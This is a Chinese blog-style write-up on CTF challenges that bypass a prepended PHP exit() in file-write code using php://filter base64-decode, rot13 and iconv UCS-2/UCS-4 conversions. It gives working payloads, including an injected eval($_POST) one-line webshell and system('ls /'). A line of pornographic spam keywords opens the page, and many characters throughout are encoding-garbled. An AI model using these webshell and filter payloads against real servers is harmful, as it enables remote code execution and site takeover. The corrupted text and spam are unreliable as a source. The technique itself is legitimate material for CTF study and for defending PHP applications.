亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

php filter協(xié)議使用方法

 更新時(shí)間:2022年12月15日 09:04:00   作者:偶爾躲躲烏云334  
php://filter是一種設(shè)計(jì)用來允許過濾器程序在打開時(shí)成為流的封裝協(xié)議。這對(duì)于單獨(dú)具有完整功能的文件函數(shù)非常有用,否則就沒有機(jī)會(huì)在讀取內(nèi)容之前將過濾器應(yīng)用于流之上
<?php
highlight_file(__FILE__);
error_reporting(0);
$content = $_POST['content'];
file_put_contents($_GET['filename'], "<?php exit; ?>".$content);
?>

base64加密

看文章的時(shí)候看到這樣的一個(gè)代碼,發(fā)現(xiàn)我們往文件中寫入的時(shí)候,肯定會(huì)執(zhí)行<?php exit;?>,可是這樣就直接退出了就不能執(zhí)行我們后面的命令,所以我們要想辦法去繞過,或者說不執(zhí)行這個(gè)exit

這道題,可控點(diǎn)有兩個(gè) filename 和 content,先直接給出payload ,然后解析

GET:?filename=php://filter/convert.base64-decode/resource=shell.php

POST:content=PD9waHAgcGhwaW5mbygpOz8+

上面的POST段為<?php phpinfo();?>加密段

看完大佬的文章理解:

base64只對(duì)64個(gè)字符解密,那如果不是64個(gè)字符中的,會(huì)直接忽略不計(jì)

并且base64中的字符,是要求是4個(gè)字節(jié)的倍數(shù),如果實(shí)在不行則=補(bǔ)齊

隨便輸入一個(gè)都是4字節(jié)的倍數(shù)

<?php exit; ?>這個(gè)數(shù)據(jù)是固定的,而< > ; ?是64以外的字符,解碼時(shí)會(huì)忽略,我們需要考慮的就是phpexit(空格不需要考慮),因?yàn)槭?的倍數(shù),如果在最后面系統(tǒng)自動(dòng)加上=號(hào)的話,就改變了我們期望的值,所以需要我們手動(dòng)進(jìn)行修改,這時(shí)候我們可以在前面隨便添加一個(gè)數(shù)據(jù),讓它與phpexit組合起來,成為一個(gè)亂碼,不會(huì)影響后面的執(zhí)行。

還有一道就是最近遇到的一道題目,和上面的思路差不多

eval("#".$_GET['flag]);

這個(gè)#影響了我后面get傳參,不能進(jìn)行命令執(zhí)行

所以我的思路也是想如何繞過#,或者刪除了它

可是,當(dāng)時(shí)想了很久都沒有想出來,還是大佬的提醒點(diǎn)了我一下

這既然是php里面的命令,我們完全可以把前面的閉合掉,然后自己再插入一句話木馬

cmd=?><?php eval($_POST['shell']);

shell=system('ls /');進(jìn)行這樣的操作獲得flag等等,當(dāng)時(shí)腦袋瓦特了想不起來

rot13編碼繞過

rot13編碼的本質(zhì)就是將字母左移13位。

如:<?php phpinfo();>經(jīng)過rot13編碼后這樣:<?cuc cucvasb();?>

用在php://filter中的話格式大概為這樣

php://filter/string.rot13/resource=文件名

這樣的話上面的題目,用rot13繞過前面的 exit就會(huì)轉(zhuǎn)成別的東西,而我們輸入的則最后還是那串執(zhí)行代碼,這樣也就可以繞過了

結(jié)果非常清楚,前面exit被認(rèn)為是加密解密成這樣,后面我們事先加了密,所以抵消,還是原來的

加強(qiáng)繞過exit

<?php
highlight_file(__FILE__);
error_reporting(0);
$content = $_GET['content'];
file_put_contents($content, "<?php exit();".$content);

代碼換成了這樣,好比上面讓你疊飛機(jī)下面讓你造飛機(jī)(-0-)

顯而易見,只有content這一個(gè)傳參點(diǎn)了

這種就是加了一個(gè)write直接寫入文件,然后紅色部分/可以換成別的管道符,只要和rot13隔開就行

convert.iconv.

1.usc-2

這個(gè)編碼就是2個(gè)為一組交換字符的位置(空格也會(huì)交換)

為什么我們可以把filter直接寫入,因?yàn)閷懭胍院笾挥形覀冚斎氲囊痪湓捘抉R會(huì)被執(zhí)行,別的就相當(dāng)于亂碼一樣

2.usc-4

就是換成了4個(gè)字符一組交換

總結(jié):我們的思路其實(shí)都是相同的,通過某一個(gè)手段把exit繞過,然后執(zhí)行我們的命令,其實(shí)就是用一些編碼的特性,base64 rot13 usc-2 usc-4,都會(huì)把exit變成別的亂碼一般。

到此這篇關(guān)于php filter協(xié)議使用方法的文章就介紹到這了,更多相關(guān)php filter協(xié)議內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • PHP開發(fā)技巧之PHAR反序列化詳解

    PHP開發(fā)技巧之PHAR反序列化詳解

    這篇文章主要為大家介紹了PHP開發(fā)技巧之PHAR反序列化詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2022-10-10
  • 對(duì)PHP依賴注入的理解實(shí)例分析

    對(duì)PHP依賴注入的理解實(shí)例分析

    這篇文章主要介紹了對(duì)PHP依賴注入的理解,結(jié)合實(shí)例形式詳細(xì)分析了PHP依賴注入的相關(guān)概念與原理,需要的朋友可以參考下
    2016-10-10
  • php對(duì)圖像的各種處理函數(shù)代碼小結(jié)

    php對(duì)圖像的各種處理函數(shù)代碼小結(jié)

    這篇文章主要介紹了php的圖片處理實(shí)現(xiàn)代碼,包括縮放、剪裁、縮放、翻轉(zhuǎn)、旋轉(zhuǎn)、透明、銳化等圖片操作,需要的朋友可以參考下
    2013-07-07
  • php生成圖片驗(yàn)證碼

    php生成圖片驗(yàn)證碼

    驗(yàn)證碼在WEB應(yīng)用中非常重要,通常用來防止用戶惡意提交表單,如惡意注冊(cè)和登錄、論壇惡意灌水等。本文將通過實(shí)例講解使用PHP生成常見的驗(yàn)證碼
    2015-06-06
  • 解析php二分法查找數(shù)組是否包含某一元素

    解析php二分法查找數(shù)組是否包含某一元素

    本篇文章是對(duì)在php中二分法查找數(shù)組是否包含某一元素進(jìn)行了詳細(xì)的分析介紹,需要的朋友參考下
    2013-05-05
  • 老生常談PHP位運(yùn)算的用途

    老生常談PHP位運(yùn)算的用途

    下面小編就為大家?guī)硪黄仙U凱HP位運(yùn)算的用途。小編覺得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過來看看吧
    2017-03-03
  • 54個(gè)提高PHP程序運(yùn)行效率的方法

    54個(gè)提高PHP程序運(yùn)行效率的方法

    本文給大家分享的是個(gè)人總結(jié)的關(guān)于提高PHP程序運(yùn)行效率的方法,有相同需求的小伙伴可以來參考下。
    2015-07-07
  • 通俗易懂的php防注入代碼

    通俗易懂的php防注入代碼

    一直搞.net ,最近研究PHP,也涉及到防注入的安全措施,和.net的大同小異,從網(wǎng)上摘回一篇,作為備注,以供自己需要時(shí)查閱。
    2010-04-04
  • 分享8個(gè)最佳的代碼片段在線測試網(wǎng)站

    分享8個(gè)最佳的代碼片段在線測試網(wǎng)站

    有時(shí)候,我們需要測試一些代碼片段,而電腦中沒有安裝針對(duì)該語言的運(yùn)行環(huán)境,沒關(guān)系,你可以在線測試它們
    2013-06-06
  • php自定義分頁類完整實(shí)例

    php自定義分頁類完整實(shí)例

    這篇文章主要介紹了php自定義分頁類,以完整實(shí)例形式分析了php實(shí)現(xiàn)分頁功能的原理與具體實(shí)現(xiàn)技巧,代碼中有詳細(xì)的注釋便于理解,需要的朋友可以參考下
    2015-12-12

最新評(píng)論